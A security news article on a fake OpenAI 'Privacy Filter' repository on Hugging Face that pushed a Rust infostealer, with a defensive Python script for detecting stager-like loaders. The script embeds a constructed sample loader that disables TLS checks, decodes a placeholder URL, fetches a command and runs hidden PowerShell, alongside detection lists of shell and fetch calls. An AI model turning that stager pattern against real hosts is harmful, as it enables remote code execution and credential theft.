Fake OpenAI 'Privacy Filter' on Hugging Face Pushes Infostealer Malware
A malicious repository on **Hugging Face**, masquerading as **OpenAI**'s 'Privacy Filter' project, distributed information-stealing malware to Windows users. The repository briefly topped the trending list, accumulating 244,000 downloads before being removed.

**Hugging Face**, a platform for sharing AI models and datasets, was recently abused to distribute malware. A malicious repository, impersonating **OpenAI**'s legitimate "Privacy Filter," reached the platform's trending list and infected Windows users with information-stealing malware.
### Deceptive Tactics
The rogue repository briefly held the #1 position on **Hugging Face**, amassing 244,000 downloads before the platform intervened. Researchers at **HiddenLayer**, a firm specializing in AI and ML model security, discovered the malicious repository, named `Open-OSS/privacy-filter`, on May 7.
"The repository had typosquatted **OpenAI**'s legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a `loader.py` file that fetches and executes infostealer malware on Windows machines," the researchers explained.

*Instructions from the malicious repository (Source: HiddenLayer)*
### Technical Details of the Attack
The `loader.py` Python script contained seemingly harmless AI-related code. Underneath, however, it disabled TLS certificate verification, decoded a base64-encoded URL pointing to an external resource, and fetched from it a JSON payload containing a PowerShell command.
That command, run in a hidden window, downloads a batch file (`start.bat`) that performs privilege escalation, downloads the final payload (`sefirah`), adds it to **Microsoft Defender**'s exclusions, and executes it.
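The loader behaviour described above (certificate verification switched off, a base64-encoded URL decoded at runtime, a remote fetch, and PowerShell launched in a hidden window) is easy to spot with a static check before any file from a model repository is executed. The script below is an added example written for this article, not HiddenLayer's tooling and not the real `loader.py`, whose contents are not reproduced here; it parses Python files with the standard `ast` module and reports those four indicators. The embedded sample loader is constructed to mimic the pattern and points at a placeholder `example.invalid` URL.

```python
"""Static triage of Python files in a model repository for stager-style
behaviour: TLS verification disabled, a base64 literal that decodes to a
URL, a remote fetch, and PowerShell started with a hidden window.
Added example; not HiddenLayer's code and not the actual loader.py."""
import ast
import base64
import binascii
import re
from dataclasses import dataclass

URL_RE = re.compile(r"^https?://", re.IGNORECASE)

# Constructed sample that imitates the behaviour pattern described in the
# article.  It is NOT the real loader.py; the URL is a placeholder.
_PLACEHOLDER_B64 = base64.b64encode(b"https://example.invalid/cfg.json").decode()
SAMPLE_LOADER = f'''
import ssl, json, base64, urllib.request, subprocess
ssl._create_default_https_context = ssl._create_unverified_context
u = base64.b64decode("{_PLACEHOLDER_B64}").decode()
cfg = json.loads(urllib.request.urlopen(u).read())
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command", cfg["cmd"]])
'''

# Constructed benign file used as a negative control.
BENIGN_LOADER = '''
import json
def load_config(path):
    with open(path) as fh:
        return json.load(fh)
'''

SHELL_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
               "subprocess.check_output", "os.system", "os.popen"}
FETCH_CALLS = {"urllib.request.urlopen", "requests.get", "requests.post"}


@dataclass(frozen=True)
class Finding:
    kind: str    # indicator category
    line: int    # source line where it occurs
    detail: str  # what was matched


def _dotted(node):
    """Return 'pkg.attr.name' for a Name/Attribute chain, else ''."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _string_consts(node):
    """Yield every string literal nested anywhere under a node."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            yield sub.value


def _decoded_url(literal):
    """Return the decoded text if the literal is base64 hiding a URL."""
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return text if URL_RE.match(text) else None


def triage_source(source, filename="<source>"):
    """Return a list of Finding objects for the given Python source text."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        # 1. TLS verification disabled via the ssl module's default context
        if isinstance(node, ast.Assign) and _dotted(node.value) == "ssl._create_unverified_context":
            findings.append(Finding("ssl_verify_disabled", node.lineno, _dotted(node.value)))
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        # 1b. TLS verification disabled via verify=False (requests-style APIs)
        for kw in node.keywords:
            if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                findings.append(Finding("ssl_verify_disabled", node.lineno, f"{name}(verify=False)"))
        # 2. A base64 literal that decodes to an http(s) URL
        if name.endswith("b64decode"):
            for lit in _string_consts(node):
                url = _decoded_url(lit)
                if url:
                    findings.append(Finding("b64_url", node.lineno, url))
        # 3. PowerShell launched with a hidden window
        if name in SHELL_CALLS:
            blob = " ".join(_string_consts(node)).lower()
            if "powershell" in blob and "hidden" in blob:
                findings.append(Finding("hidden_powershell", node.lineno, blob[:80]))
        # 4. Remote fetch of a second stage
        if name in FETCH_CALLS:
            findings.append(Finding("remote_fetch", node.lineno, name))
    return findings


def is_stager_like(findings, threshold=3):
    """True when at least `threshold` distinct indicator kinds co-occur."""
    return len({f.kind for f in findings}) >= threshold


if __name__ == "__main__":
    for f in triage_source(SAMPLE_LOADER, "sample_loader.py"):
        print(f"line {f.line}: {f.kind}: {f.detail}")
    print("stager-like:", is_stager_like(triage_source(SAMPLE_LOADER)))
```

The threshold deliberately requires several indicators together: disabling certificate verification or decoding base64 each occur in legitimate code, but their combination with a hidden PowerShell launch and a remote fetch has no place in a model loader. Run the check over every `.py` file in a downloaded repository before importing anything from it, and treat any `b64_url` hit as a reason to inspect the decoded destination by hand.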
### Infostealer Capabilities
The final payload is a Rust-based infostealer that targets a wide range of sensitive data, including:
* Browser data from Chromium- and Gecko-based browsers (e.g., cookies, saved passwords, encryption keys, browsing data, session tokens)
* Discord tokens, local databases, and master keys
* Cryptocurrency wallets and wallet browser extensions
* SSH, FTP (including FileZilla), and VPN credentials and configuration files
* Sensitive local files and wallet seeds/keys
* System information
* Multi-monitor screenshots
The stolen data is compressed and exfiltrated to a command-and-control (C2) server at `recargapopular[.]com`.
### Anti-Analysis Measures
**HiddenLayer** emphasized the malware's anti-analysis features: it checks for virtual machines, sandboxes, debuggers, and common analysis tools, and alters its behaviour to evade detection and hinder investigation.
The exact number of victims remains unclear. Researchers noted that many of the 667 accounts that liked the repository appeared to be auto-generated, and the 244,000 download count may have been inflated.
Further investigation revealed other repositories using the same malicious loader infrastructure, with overlaps observed in an npm typosquatting campaign distributing the WinOS 4.0 implant.
### Mitigation Steps
Users who downloaded files from the malicious repository are strongly advised to:
* Reimage the affected machine.
* Rotate all credentials stored on the machine, including browser-saved passwords and SSH, FTP, VPN, and Discord credentials.
* Replace cryptocurrency wallets and seed phrases.
* Invalidate browser sessions and tokens.
This incident highlights the ongoing abuse of **Hugging Face** to host malicious models, despite the platform's security measures. Vigilance and proactive security measures are crucial for users of AI model repositories.